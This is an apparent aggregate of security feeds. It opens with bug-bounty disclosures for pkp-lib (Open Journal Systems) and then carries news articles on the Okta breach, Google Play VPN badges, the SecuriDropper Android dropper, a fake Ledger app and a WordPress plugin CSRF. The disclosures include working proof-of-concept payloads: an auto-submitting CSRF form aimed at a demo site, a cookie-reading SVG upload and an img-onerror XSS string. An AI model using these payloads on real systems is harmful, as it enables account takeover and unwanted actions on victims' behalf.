Cross-Site Request Forgery in GitHub repository pkp/pkp-lib prior to 3.3.0-16.



Description

CSRF Delete Navigation Menu Items

Proof of Concept

1 .Attack sends fake requests to users

    <html>
       <body>    
     <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/navigation- 
       menus/navigation-menu-items-grid/delete-navigation-menu-item">      
      <input type="hidden" name="navigationMenuItemId" value="330" />    
      <input type="hidden" name="csrfToken" value="" />     
      <input type="submit" value="Submit request" />
     </form>
     <script>
           history.pushState('', '', '/');
            document.forms[0].submit();
           </script>
        </body>
      </html>
    

2 .User click, deletes unwanted Navigation Menu Items

Payload Poc

https://drive.google.com/file/d/15cjZ2oBeBmUx-C9\_kRqBXKMXLX8LU5Ew/view?usp=sharing

Video Poc

https://drive.google.com/file/d/1Bp1M3ifN9rXdxhjfyAIibmy0QFhYluEu/view?usp=sharing

**Impact**

Trick users to do unintended actions.

CVE-2023-5900: CSRF Delete Navigation Menu Items in pkp-lib

Cross-site Scripting in GitHub repository pkp/pkp-lib prior to 3.3.0-16.



**Description**

I tested the demo site you provided. I see that there is a file upload vulnerability which can lead to XSS. Hope you check and find a solution as soon as possible.

**Proof of Concept**

link video Poc

https://drive.google.com/file/d/1LAcTulbfhGJfCmWdIel9e-Sk\_\_uoQbDq/view?usp=sharing

**Steps**

1 .Login as account demo

2 .Access the module issues

3 .Then create an issue

4 .Upload an SVG file with the following content:

             <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
                 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
                 <script type="text/javascript">
                         alert(document.cookie);
                 </script>
              </svg>
    

5 .Save the issue and access the newly created issue, then access the just uploaded SVG file and the payload will be executed

**Impact**

XSS (Cross-Site Scripting) is a type of web security vulnerability caused by improper input validation and inadequate data sanitization in a web application. It occurs when an attacker injects malicious scripts (usually in the form of HTML or JavaScript) into a website's database or storage, which is then fetched and displayed to unsuspecting users. These scripts are executed in the browsers of those who visit the infected page, enabling the attacker to steal sensitive information, such as login credentials or personal data, and potentially take control of the user's account or perform malicious actions on their behalf. To prevent stored XSS, developers must implement proper input validation and output encoding to ensure that user-supplied data is treated as plain text and not executed as code on the web page.

CVE-2023-5901: Cross-Site Scripting ( XSS) Via file upload in pkp-lib

Cross-Site Request Forgery (CSRF) in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

Valid

**Description**

CSRF led to change permissions of participant in Edit Assignment sessions.

**Proof of Concept**

    Payload: https://drive.google.com/file/d/1dHY9CS6R4mKM4F0im5n1aUxFamMEjbAa/view?usp=sharing
    Video PoC: https://drive.google.com/file/d/1AdDFE_-qOF-EvVEJzzXKguMfr6ZkXXEx/view?usp=drive_link
    

**Impact**

This vulnerability is capable of changing permissions assignments of participant

We are processing your report and will contact the pkp/pkp-lib team within 24 hours. a month ago

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back a month ago

Alec Smecher modified the Severity from Medium (5.4) to Medium (4.3) a month ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

The fix bounty has been dropped

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Nov 1st 2023

to join this conversation

We are processing your report and will contact the pkp/pkp-lib team within 24 hours. a month ago

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back a month ago

Alec Smecher modified the Severity from Medium (5.4) to Medium (4.3) a month ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

The fix bounty has been dropped

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Nov 1st 2023

to join this conversation

CVE-2023-5902: Cross-Site Request Forgery (CSRF) in  in pkp-lib

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

**Description**

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

**Proof of Concept**

https://drive.google.com/file/d/1ZrzJwy1kKdGPPmkIbU-GOB5Ok\_G3Yywf/view?usp=sharing

**Impact**

This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...

CVE-2023-5903: STORED XSS in Journal-> Sections in pkp-lib

**BUG**

Stored xss using journal-name in journal-tab

**ACCOUNT**

1\. user-A --> superadmin --> Victim --> Firefox browser Normal mode  
2\. user-B --> journal manager --> Attacker --> Firefox browser Container-1\\

**STEP TO RERPODUCE**

1\. From user-A account create a journal called "journal-A".

2\. Add user-B to this journal as "journal manager" .i already did

3\. Login into user-B account and change journal name to xss payloadxss"'><img src=x onerror=alert(document.domain)>

4\. from user-A account open journal-statistics in http://localhost/ojs-3.4.0-3/index.php/xss/stats/context/context and see xss is executed \\

**IMPACT**

Using this xss attacker(user-B) can execute any javascript code in victim(user-A) account . And can full control over the victim account by executing any javascript code

**VIDEO POC**

https://drive.google.com/file/d/1iA456XdYaWe7qgkkkhp\_I3Wzlr8fn2Re/view?usp=sharing

**Impact**

Using this xss attacker(user-B) can execute any javascript code in victim(user-A) account . And can full control over the victim account by executing any javascript code

CVE-2023-5904: Stored xss using journal-name in journal-tab in pkp-lib

By Waqas
Some of the most prominent victims of the data breach include Cloudflare, 1Password, and BeyondTrust.
This is a post from HackRead.com Read the original post: Okta Breach Linked to Employee’s Google Account, Affects 134 Customers

Okta’s investigation determined the breach to be associated with a Google account belonging to one of the company’s employees.

In a recent update following the initial data breach announcement made in October 2023, Okta, a prominent identity and access management (IAM) provider, disclosed that the number of affected customers has now reached 134. This breach enabled threat actors to gain unauthorized access to files.

“Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks,” David Bradbury, Okta’s chief security officer explained in Friday’s November 4th update.

Between September 28 and October 17, 2023, Okta encountered a sophisticated attack, wherein a threat actor accessed Okta’s support case management system by compromising a stolen account. Afterwards, the threat actor gained the ability to view, update support cases, and extract sensitive data, which included session tokens.

On October 19, Okta became aware of the breach following a notification from one of its customers, BeyondTrust, regarding suspicious activities. Among the prominent customers affected by the breach are Cloudflare and 1Password. Pedro Canahuati, the CTO of 1Password, disclosed the incident, confirming that threat actors were unable to access or extract user data during the attack.

****Google Account Connection****

Originally, the incident was thought to occur as a threat actor accessed an IT employee’s Okta session token by leveraging a stolen credential, thus gaining entry into 1Password’s Okta administrative portal. However, Bradbury later revealed that the investigation determined the breach to be associated with a Google account belonging to one of the company’s employees.

“Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop,” Bradbury said. “The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.”

As to why it took two weeks for Okta to address the issue, Bradbury further explained that “Okta didn’t find any suspicious downloads in their system logs.” They noted that when someone looks at files attached to a support case, there’s a special record in their logs. But if a person goes directly to the Files section in the customer support system, it creates a different record. The attackers used this method in their attack.

“Okta first looked into access to support cases and then checked the logs related to those cases. On October 13, 2023, BeyondTrust gave Okta Security an IP address linked to the attackers. With this information, Okta found more file access events tied to the compromised account,” said Bradbury.

In a comment to Hackread.com, Tal Skverer, Research Team Lead at Astrix Security, discussed the use of personal accounts on devices issued by the company stating that “Service accounts skip security measures that normal accounts are subject to, such as MFA, therefore; their credentials are extremely vulnerable.”

“It is with utmost importance that service accounts follow the least privilege principle. Skverer emphasised. “To limit their permissions, their usage should be limited to very unique functionalities.”

The Okta breach is a major concern for the cybersecurity community, as Okta is a trusted IAM provider for many organizations, including Fortune 500 companies and government agencies. The breach also highlights the growing sophistication of threat actors and the need for organizations to take steps to protect their data from increasingly targeted attacks.

Nevertheless, the latest security breach at Okta serves as the second cyberattack on the company. In March 2022, LAPSUS$ hackers claimed to have breached Okta and Microsoft after leaking a trove of their data on Telegram.

****What Organizations Can Do to Protect Themselves****

Organizations can take a number of steps to protect themselves, including:

*   **Implement strong password policies and require users to use multi-factor authentication (MFA).** MFA adds an extra layer of security to user accounts by requiring users to provide a second form of authentication, such as a code from their phone, in addition to their password.
*   **Regularly update security software and patches.** Software developers release security updates to patch known vulnerabilities. By regularly updating their software and patches, organizations can help to reduce the risk of being exploited by attackers.
*   **Educate employees about cybersecurity best practices.** Employees should be trained on how to identify and avoid phishing attacks, and how to protect their devices and data.
*   **Monitor their systems for suspicious activity.** Organizations should have systems in place to monitor their systems for suspicious activity, such as unusual login attempts or data exfiltration.

1.  IBM Notifies Janssen CarePath Customers of Data Breach
2.  Human Error: Casio ClassPad Data Breach Impacting 148 Countries
3.  Sony Data Breach via MOVEit Vulnerability Affects Thousands in US
4.  Fake Bitwarden Password Manager Website Drops Windows ZenRAT
5.  Kroll SIM-Swapping Attack Causes Data Breach at 3 Top Crypto Firms
6.  Passwords by Kaspersky Password Manager exposed to brute-force attack

Okta Breach Linked to Employee’s Google Account, Affects 134 Customers

By Deeba Ahmed
The new feature will add an Independent Security Review badge at the top of the Google Play search results page when users search for VPN apps. 
This is a post from HackRead.com Read the original post: Google Launches Verification Badges for Security Tested VPN Apps

The new feature is the latest in line with increasing security and precautionary measures by Google to keep malicious Android apps away from its Play Store.

Google Play has introduced a new feature to inform users looking for reliable VPN (virtual private network) apps if the apps have undergone an independent security review. The new feature will add an Independent Security Review badge at the top of the Google Play search results page when users search for VPN apps. 

This badge will ensure the app has been scanned through an independent security review. That’s not all! The banner will provide additional information under the Learn More option, which will redirect them to the App Validation Directory, providing technical assessment details so that users can make informed decisions when downloading VPNs.

Screenshot: Google

The certification can be checked in the app’s Data Safety section on Google Play Store. Its presence means the application has been tested against pre-determined security criteria, which Google has developed with several cybersecurity partners.

The badge will inform users that the app has been verified and validated by an independent third party and meets the minimum best practices standards of the industry’s mobile security and privacy guidelines. It will also indicate that the app’s developers will identify/mitigate vulnerabilities promptly.

For your information, in 2022, the App Defense Alliance (ADA) launched the Mobile App Security Assessment (MASA) to let developers evaluate their apps independently against a strict global security standard.

This serves as an assurance for users that app developers are following best practices for privacy and security. Successful validation will allow the developers to display the badge in their app’s Data Safety section. This addition will make it more challenging for cybercriminals to access users’ devices through compromised apps and improve the app’s quality.

Although adhering to “baseline security standards” won’t guarantee that the app will be vulnerability-free, the badge will serve as a “visual cue” for users that it has been scanned and validated.

The new feature has been rolled out for VPN apps and selected app categories as the company wants to secure sensitive apps initially. VPNs hold a substantial volume of data as they are primarily used for searching and accessing websites. In a blog post, Nataliya Stanetsky, Android Security and Privacy Team wrote that:

> _“VPN providers such as NordVPN, Google One, ExpressVPN, and others have already undergone independent security testing and publicly declared the badge showing their good standing with the MASA program. We encourage and anticipate additional VPN app developers to undergo independent security testing, bringing even more transparency to users.”_
> 
> Google

This is a proactive move to enhance app security and protect user data, underscoring the company’s commitment to improving cybersecurity in the digital space. Users are generally unaware of the risks associated with VPN apps. Many of these apps can be designed to collect sensitive device or user data and may even inject malware onto their devices. 

1.  Google Makes Passkeys Default for All Users
2.  Google offers Dark Web monitoring for US Gmail users
3.  Google Buys Cyber Security Firm Mandiant for $5.4 Billion
4.  Google Chrome to Mask User IP Addresses to Protect Privacy
5.  Google Introduces Bug Bounty Program for Open-Source Software
6.  Google Removes Swing VPN Android App Exposed as DDoS Botnet
7.  Google’s Latest Android Feature Drop: Dark Web Search for Gmail ID
8.  Essential Insights on Google Cloud Backup and Disaster Recovery Service

Google Launches Verification Badges for Security Tested VPN Apps

Cybersecurity researchers have shed light on a new dropper-as-a-service (DaaS) for Android called SecuriDropper that bypasses new security restrictions imposed by Google and delivers the malware.
Dropper malware on Android is designed to function as a conduit to install a payload on a compromised device, making it a lucrative business model for threat actors, who can advertise the capabilities

Mobile Security / Malware

Cybersecurity researchers have shed light on a new dropper-as-a-service (DaaS) for Android called **SecuriDropper** that bypasses new security restrictions imposed by Google and delivers the malware.

Dropper malware on Android is designed to function as a conduit to install a payload on a compromised device, making it a lucrative business model for threat actors, who can advertise the capabilities to other criminal groups.

What's more, doing so also allows adversaries to separate the development and execution of an attack from the installation of the malware.

"Droppers and the actors behind them are in a constant state of evolution as they strive to outwit evolving security measures," Dutch cybersecurity firm ThreatFabric said in a report shared with The Hacker News.

One such security measure introduced by Google with Android 13 is what's called the Restricted Settings, which prevents sideloaded applications from obtaining Accessibility and Notification Listener permissions, which are often abused by banking trojans.

SecuriDropper aims to get around this guardrail without getting detected, with the dropper often disguised as a seemingly harmless app. Some of the samples observed in the wild are as follows -

*   com.appd.instll.load (Google)
*   com.appd.instll.load (Google Chrome)

"What makes SecuriDropper stand out is the technical implementation of its installation procedure," ThreatFabric explained.

"Unlike its predecessors, this family uses a different Android API to install the new payload, mimicking the process used by marketplaces to install new applications."

Specifically, this entails requesting for permissions to read and write data to external storage (READ\_EXTERNAL\_STORAGE and WRITE\_EXTERNAL\_STORAGE) as well as install and delete packages (REQUEST\_INSTALL\_PACKAGES and DELETE\_PACKAGES).

In the second stage, the installation of the malicious payload is facilitated by urging the victims to click on a "Reinstall" button on the app to resolve a purported installation error.

ThreatFabric said it has observed Android banking trojans such as SpyNote and ERMAC distributed via SecuriDropper on deceptive websites and third-party platforms like Discord.

Another dropper service that has also been spotted offering a similar Restricted Settings bypass is Zombinder, an APK binding tool that was suspected to be shut down earlier this year. It's currently not clear if there is any connection between the two tools.

"As Android continues to raise the bar with each iteration, cybercriminals, too, adapt and innovate," the company said. "Dropper-as-a-Service (DaaS) platforms have emerged as potent tools, allowing malicious actors to infiltrate devices to distribute spyware and banking trojans."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SecuriDropper: New Android Dropper-as-a-Service Bypasses Google's Defenses

By Waqas
After a surge of malware on the Google Play Store, is Microsoft also failing to properly vet apps for malware?
This is a post from HackRead.com Read the original post: Scammers Use Fake Ledger App on Microsoft Store to Steal $800,000 in Crypto

The fake Ledger Live app on the Microsoft Store deceived users into downloading malware, which stole their Bitcoin and Ethereum funds.

Hackread.com has been actively following the cryptocurrency space as it has lately been a prominent target of scams and cyberattacks. Hackers are eyeing the crypto industry to steal valuable assets and even NFTs.

For this purpose, crooks devise clever tactics to lure unsuspecting users into giving away their funds and tokens. One such scam was recently reported by a pseudonymous on-chain detective and crypto sleuth, ZachXBT. 

According to ZachXBT, a fake Ledger app was circulating on the Microsoft App Store. This fraudulent app masqueraded as the official Ledger Live app and tricked users into unwittingly downloading and installing malware stealing victims’ crypto funds and data.

Fake Ledger app on Microsoft Store (Screenshot: ZachXBT)

ZachXBT’s analysis stressed the sophisticated nature of this scam, emphasizing the critical need for end-users to stay alert in protecting their cryptocurrency wallets. As of November 4th, scammers successfully collected roughly $588,000 in Bitcoin by hijacking users’ crypto wallets.

In a tweet, ZachXBT cautioned crypto users and investors with the following warning: “Community Alert: There is currently a fake @Ledger Live app on the official @Microsoft App Store which was resulted in 16.8+ BTC ($588K) stolen.”

However, on November 5th, ZachXBT received updated information from a victim, indicating a loss of $180,000 worth of ETH due to the fake Ledger app. This significantly increased the total lost payments to over $768,000.

Stolen funds (Screenshot: Hackread.com)

It is worth noting that in November 2023, a fake Ledger Live app was uploaded to the official Microsoft App Store that looked exactly like the original Ledger Live app. For your information, it is a popular software wallet designed to help users manage their crypto assets.

However, those who downloaded the fake version of this app ended up installing malware capable of stealing cryptocurrency by intercepting users’ recovery phrases. The attackers specifically targeted users who store their cryptocurrency in the Ledger hardware wallets to profit by stealing their assets.

The attackers designed the fake app quite cunningly, replicating the look and features of the authentic app, including identical logos and branding materials. They went as far as creating a fraudulent Ledger device pin verification process. This tricky similarity between the original and fake apps makes it challenging for users to differentiate between them.

Nevertheless, Microsoft promptly detected and removed the fake Ledge Live app from their store. The company is investigating how the fake Ledger app bypassed its app review process, however, the damage to users is already done.

Remember that apps like Ledger, Trezor, or another hardware wallet will never ask users to enter their recovery phrases into their computers or phones. You should always enter the phrase in the hardware wallet to recover it.

1.  Teen Hacks Ledger Hardware Cryptocurrency Wallet
2.  New DoubleFinger Malware Strikes Cryptocurrency Wallets
3.  All Ledger hardware wallets vulnerable to man in middle attack
4.  Ledger data breach: Hacker leaks stolen database on hacker forum
5.  Crypto wallet Ledger data breach; hackers steal 1m emails, other data

Scammers Use Fake Ledger App on Microsoft Store to Steal $800,000 in Crypto

Cross-Site Request Forgery (CSRF) vulnerability in ThemeKraft TK Google Fonts GDPR Compliant plugin <= 2.2.11 versions.

**Solution**

 Fixed

Update the WordPress TK Google Fonts GDPR Compliant plugin to the latest available version (at least 2.2.12).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress TK Google Fonts GDPR Compliant Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.2.12.

**Other vulnerabilities in this plugin**

 0 present

 5 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#google